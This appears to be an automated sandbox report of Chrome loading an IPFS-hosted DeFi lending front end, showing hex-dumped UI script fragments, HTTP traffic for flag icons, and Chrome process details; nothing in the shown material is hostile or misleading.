                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 28 30 2c 75 65 2e 4d 6f 29 28 65 2e 63 68 61 69 6e 49 64 29 3b 72 65 74 75 72 6e 28 30 2c 78 65 2e 6a 73 78 73 29 28 6f 65 2e 5a 2c 7b 6f 6e 43 6c 69 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 26 26 6f 28 65 29 2c 78 28 6e 75 6c 6c 29 7d 28 65 29 7d 2c 63 68 69 6c 64 72 65 6e 3a 5b 28 30 2c 78 65 2e 6a 73 78 29 28 6e 65 2e 5a 2c 7b 6f 76 65 72 6c 61 70 3a 22 63 69 72 63 75 6c 61 72 22 2c 61 6e 63 68 6f 72 4f 72 69 67 69 6e 3a 7b 76 65 72 74 69 63 61 6c 3a 22 62 6f 74 74 6f 6d 22 2c 68 6f 72 69 7a 6f 6e 74 61 6c 3a 22 72 69 67 68 74 22 7d 2c 62 61 64 67 65 43 6f 6e 74 65 6e 74 3a 28 30 2c 78 65 2e 6a 73 78 29 28 69 65 2e 5a 2c 7b 73 72 63 3a 74
                                                                                                                                                                                                                                                  Data Ascii: function(e){var t=(0,ue.Mo)(e.chainId);return(0,xe.jsxs)(oe.Z,{onClick:function(){return function(e){o&&o(e),x(null)}(e)},children:[(0,xe.jsx)(ne.Z,{overlap:"circular",anchorOrigin:{vertical:"bottom",horizontal:"right"},badgeContent:(0,xe.jsx)(ie.Z,{src:t
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 4e 6f 20 61 73 73 65 74 73 20 73 65 6c 65 63 74 65 64 20 74 6f 20 6d 69 67 72 61 74 65 2e 22 7d 29 3b 63 61 73 65 20 54 2e 56 32 5f 48 46 5f 54 4f 4f 5f 4c 4f 57 3a 72 65 74 75 72 6e 28 30 2c 78 65 2e 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 54 68 69 73 20 61 63 74 69 6f 6e 20 77 69 6c 6c 20 72 65 64 75 63 65 20 56 32 20 68 65 61 6c 74 68 20 66 61 63 74 6f 72 20 62 65 6c 6f 77 20 6c 69 71 75 69 64 61 74 69 6f 6e 20 74 68 72 65 73 68 6f 6c 64 2e 20 72 65 74 61 69 6e 20 63 6f 6c 6c 61 74 65 72 61 6c 20 6f 72 20 6d 69 67 72 61 74 65 20 62 6f 72 72 6f 77 20 70 6f 73 69 74 69 6f 6e 20 74 6f 20 63 6f 6e 74 69 6e 75 65 2e 22 7d 29 3b 63 61 73 65 20 54 2e 56 33 5f 48 46 5f 54 4f 4f 5f 4c 4f 57 3a 72 65 74 75 72 6e 28 30
                                                                                                                                                                                                                                                  Data Ascii: x)(i.cC,{id:"No assets selected to migrate."});case T.V2_HF_TOO_LOW:return(0,xe.jsx)(i.cC,{id:"This action will reduce V2 health factor below liquidation threshold. retain collateral or migrate borrow position to continue."});case T.V3_HF_TOO_LOW:return(0
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 68 46 61 63 74 6f 72 3f 54 2e 56 32 5f 48 46 5f 54 4f 4f 5f 4c 4f 57 3a 4e 75 6d 62 65 72 28 65 2e 74 6f 55 73 65 72 53 75 6d 6d 61 72 79 41 66 74 65 72 4d 69 67 72 61 74 69 6f 6e 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 29 3c 31 2e 30 30 35 26 26 22 2d 31 22 21 3d 3d 65 2e 74 6f 55 73 65 72 53 75 6d 6d 61 72 79 41 66 74 65 72 4d 69 67 72 61 74 69 6f 6e 2e 68 65 61 6c 74 68 46 61 63 74 6f 72 3f 54 2e 56 33 5f 48 46 5f 54 4f 4f 5f 4c 4f 57 3a 6c 3f 54 2e 49 4e 53 55 46 46 49 43 49 45 4e 54 5f 4c 54 56 3a 6e 75 6c 6c 7d 28 6f 2c 21 21 74 2c 6d 29 3a 6e 75 6c 6c 3b 72 65 74 75 72 6e 28 30 2c 78 65 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 66 6c 65 78 44 69 72 65 63 74 69 6f 6e 3a 22 63 6f 6c 75 6d 6e 22 2c 77 69
                                                                                                                                                                                                                                                  Data Ascii: hFactor?T.V2_HF_TOO_LOW:Number(e.toUserSummaryAfterMigration.healthFactor)<1.005&&"-1"!==e.toUserSummaryAfterMigration.healthFactor?T.V3_HF_TOO_LOW:l?T.INSUFFICIENT_LTV:null}(o,!!t,m):null;return(0,xe.jsx)(s.Z,{sx:{display:"flex",flexDirection:"column",wi
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 29 28 76 65 2c 7b 62 6c 6f 63 6b 69 6e 67 45 72 72 6f 72 3a 66 7d 29 7d 29 2c 72 26 26 28 30 2c 78 65 2e 6a 73 78 29 28 51 2e 69 2c 7b 73 65 76 65 72 69 74 79 3a 22 77 61 72 6e 69 6e 67 22 7d 29 2c 6e 75 6c 6c 3d 3d 3d 66 26 26 28 30 2c 78 65 2e 6a 73 78 29 28 73 2e 5a 2c 7b 73 78 3a 7b 68 65 69 67 68 74 3a 22 34 34 70 78 22 2c 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 3a 22 62 61 63 6b 67 72 6f 75 6e 64 2e 73 75 72 66 61 63 65 22 2c 62 6f 72 64 65 72 52 61 64 69 75 73 3a 22 34 70 78 22 2c 64 69 73 70 6c 61 79 3a 22 66 6c 65 78 22 2c 6a 75 73 74 69 66 79 43 6f 6e 74 65 6e 74 3a 22 63 65 6e 74 65 72 22 2c 6d 62 3a 34 7d 2c 22 64 61 74 61 2d 63 79 22 3a 22 6d 69 67 72 61 74 69 6f 6e 2d 72 69 73 6b 2d 63 68 65 63 6b 62 6f 78 22 2c 63 68 69 6c 64 72 65 6e
                                                                                                                                                                                                                                                  Data Ascii: )(ve,{blockingError:f})}),r&&(0,xe.jsx)(Q.i,{severity:"warning"}),null===f&&(0,xe.jsx)(s.Z,{sx:{height:"44px",backgroundColor:"background.surface",borderRadius:"4px",display:"flex",justifyContent:"center",mb:4},"data-cy":"migration-risk-checkbox",children
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1369INData Raw: 33 2c 6c 67 3a 34 7d 7d 2c 63 68 69 6c 64 72 65 6e 3a 28 30 2c 78 65 2e 6a 73 78 29 28 69 2e 63 43 2c 7b 69 64 3a 22 4d 69 67 72 61 74 69 6e 67 20 6d 75 6c 74 69 70 6c 65 20 63 6f 6c 6c 61 74 65 72 61 6c 73 20 61 6e 64 20 62 6f 72 72 6f 77 65 64 20 61 73 73 65 74 73 20 61 74 20 74 68 65 20 73 61 6d 65 20 74 69 6d 65 20 63 61 6e 20 62 65 20 61 6e 20 65 78 70 65 6e 73 69 76 65 20 6f 70 65 72 61 74 69 6f 6e 20 61 6e 64 20 6d 69 67 68 74 20 66 61 69 6c 20 69 6e 20 63 65 72 74 61 69 6e 20 73 69 74 75 61 74 69 6f 6e 73 2e 3c 30 3e 54 68 65 72 65 66 6f 72 65 20 69 74 5c 75 32 30 31 39 73 20 6e 6f 74 20 72 65 63 6f 6d 6d 65 6e 64 65 64 20 74 6f 20 6d 69 67 72 61 74 65 20 70 6f 73 69 74 69 6f 6e 73 20 77 69 74 68 20 6d 6f 72 65 20 74 68 61 6e 20 35 20 61 73 73 65
                                                                                                                                                                                                                                                  Data Ascii: 3,lg:4}},children:(0,xe.jsx)(i.cC,{id:"Migrating multiple collaterals and borrowed assets at the same time can be an expensive operation and might fail in certain situations.<0>Therefore it\u2019s not recommended to migrate positions with more than 5 asse


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  147192.168.2.549873209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC478OUTGET /icons/flags/fr.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1326INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:12:00 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 271
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidm7bo2ktkmkvg2a6zk5rxq34uwapmnfcqqf3koc7ootgt5pv43ti"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/icons/flags/fr.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeig3gyfey2cvkgtdeyklommqqwwsiwdiuxrnhyhxqmdojzxzf2p22a,bafybeih4p4nhrhou7h6t7ficolttjj57f6mutgszdzy3wyacr2i2nnc65m,bafkreidm7bo2ktkmkvg2a6zk5rxq34uwapmnfcqqf3koc7ootgt5pv43ti
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73312
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e4852c720f4b-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC43INData Raw: 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 31 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d
                                                                                                                                                                                                                                                  Data Ascii: <svg viewBox="0 0 20 14" fill="none" xmlns=
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC228INData Raw: 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 30 2e 30 39 39 2d 31 2e 33 37 38 48 2d 2e 30 39 39 56 31 35 2e 33 38 48 32 30 2e 31 56 2d 31 2e 33 37 39 5a 22 20 66 69 6c 6c 3d 22 23 45 44 32 39 33 39 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 31 33 2e 33 36 37 2d 31 2e 33 37 38 48 2d 2e 31 56 31 35 2e 33 38 68 31 33 2e 34 36 36 56 2d 31 2e 33 37 39 5a 22 20 66 69 6c 6c 3d 22 23 66 66 66 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 36 2e 36 33 33 2d 31 2e 33 37 38 48 2d 2e 30 39 39 56 31 35 2e 33 38 68 36 2e 37 33 32 56 2d 31 2e 33 37 39 5a 22 20 66 69 6c 6c 3d 22 23 30 30 32 33 39 35 22 2f 3e 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: "http://www.w3.org/2000/svg"><path d="M20.099-1.378H-.099V15.38H20.1V-1.379Z" fill="#ED2939"/><path d="M13.367-1.378H-.1V15.38h13.466V-1.379Z" fill="#fff"/><path d="M6.633-1.378H-.099V15.38h6.732V-1.379Z" fill="#002395"/></svg>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  148192.168.2.549874209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC478OUTGET /icons/flags/en.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1327INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:12:00 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 1041
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreidputo33gy6qhno6vikesnatbbrzkxezrnzvlvk3lmguvd5glxnwq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/icons/flags/en.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeig3gyfey2cvkgtdeyklommqqwwsiwdiuxrnhyhxqmdojzxzf2p22a,bafybeih4p4nhrhou7h6t7ficolttjj57f6mutgszdzy3wyacr2i2nnc65m,bafkreidputo33gy6qhno6vikesnatbbrzkxezrnzvlvk3lmguvd5glxnwq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73312
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e48538bf43e0-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC42INData Raw: 3c 73 76 67 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30 20 31 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73
                                                                                                                                                                                                                                                  Data Ascii: <svg viewBox="0 0 20 14" fill="none" xmlns
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC999INData Raw: 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 70 61 74 68 20 64 3d 22 4d 2d 33 2e 36 32 38 2d 2e 30 37 36 76 31 34 2e 31 35 34 68 32 36 2e 39 36 56 2d 2e 30 37 36 68 2d 32 36 2e 39 36 5a 22 20 66 69 6c 6c 3d 22 23 30 31 32 31 36 39 22 2f 3e 3c 70 61 74 68 20 64 3d 22 6d 2d 33 2e 36 32 38 2d 2e 30 37 36 20 32 36 2e 39 36 20 31 34 2e 31 35 34 4c 2d 33 2e 36 32 38 2d 2e 30 37 36 5a 6d 32 36 2e 39 36 20 30 2d 32 36 2e 39 36 20 31 34 2e 31 35 33 4c 32 33 2e 33 33 32 2d 2e 30 37 36 5a 22 20 66 69 6c 6c 3d 22 23 30 30 30 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 32 32 2e 37 33 20 31 35 2e 33 34 34 20 39 2e 38 35 32 20 38 2e 35 38 33 6c 2d 31 32 2e 38 37 38 20 36 2e 37 36 31 2d 31 2e 32 30 35 2d 32 2e 35 33 34 4c 36 2e
                                                                                                                                                                                                                                                  Data Ascii: ="http://www.w3.org/2000/svg"><path d="M-3.628-.076v14.154h26.96V-.076h-26.96Z" fill="#012169"/><path d="m-3.628-.076 26.96 14.154L-3.628-.076Zm26.96 0-26.96 14.153L23.332-.076Z" fill="#000"/><path d="M22.73 15.344 9.852 8.583l-12.878 6.761-1.205-2.534L6.


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  149192.168.2.549875209.94.90.34431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC478OUTGET /icons/flags/el.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC1326INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:12:00 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 449
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreihayzqiolkp7exxcwiubdnvxzzj4tughed442igxyfhssudmyh6za"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/icons/flags/el.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeig3gyfey2cvkgtdeyklommqqwwsiwdiuxrnhyhxqmdojzxzf2p22a,bafybeih4p4nhrhou7h6t7ficolttjj57f6mutgszdzy3wyacr2i2nnc65m,bafkreihayzqiolkp7exxcwiubdnvxzzj4tughed442igxyfhssudmyh6za
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73312
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e4854e2942e9-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC43INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 32 30
                                                                                                                                                                                                                                                  Data Ascii: <svg width="20" height="20" viewBox="0 0 20
                                                                                                                                                                                                                                                  2024-09-28 04:12:00 UTC406INData Raw: 20 31 34 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 3e 3c 67 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 61 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 32 31 20 33 48 30 76 31 34 68 32 31 56 33 5a 22 20 66 69 6c 6c 3d 22 23 30 44 35 45 41 46 22 2f 3e 3c 70 61 74 68 20 64 3d 22 4d 32 31 20 31 36 48 30 76 2d 31 2e 36 32 33 68 32 31 56 31 36 5a 6d 30 2d 33 2e 32 35 48 30 76 2d 31 2e 36 32 33 68 33 2e 31 31 31 76 2d 33 2e 32 35 48 30 56 36 2e 32 35 68 33 2e 31 31 31 56 33 68 31 2e 35 35 34 76 33 2e 32 35 68 33 2e 31 31 32 76 31 2e 36 32 33 48 32 31 76 31 2e 36 32 33 48 37 2e 37 37 37 56 37 2e 38 37 33 48 34 2e 36 36 35 76 33 2e 32 35 48 32 31 76 31 2e 36 32
                                                                                                                                                                                                                                                  Data Ascii: 14" fill="none" xmlns="http://www.w3.org/2000/svg"><g clip-path="url(#a)"><path d="M21 3H0v14h21V3Z" fill="#0D5EAF"/><path d="M21 16H0v-1.623h21V16Zm0-3.25H0v-1.623h3.111v-3.25H0V6.25h3.111V3h1.554v3.25h3.112v1.623H21v1.623H7.777V7.873H4.665v3.25H21v1.62


                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                                  Start time:00:11:28
                                                                                                                                                                                                                                                  Start date:28/09/2024
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                                                                  Start time:00:11:33
                                                                                                                                                                                                                                                  Start date:28/09/2024
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2148 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                                                                  Start time:00:11:35
                                                                                                                                                                                                                                                  Start date:28/09/2024
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/"
                                                                                                                                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                                  Target ID:7
                                                                                                                                                                                                                                                  Start time:00:12:43
                                                                                                                                                                                                                                                  Start date:28/09/2024
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                                  Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6488 --field-trial-handle=1956,i,1385837072014725862,5014382410172538292,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                                                  Imagebase:0x7ff715980000
                                                                                                                                                                                                                                                  File size:3'242'272 bytes
                                                                                                                                                                                                                                                  MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                                                                                  Target ID:8
                                                                                                                                                                                                                                                  Start time:00:12:43
                                                                                                                                                                                                                                                  Start date:28/09/2024
                                                                                                                                                                                                                                                  Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  Wow64 process (32bit):false
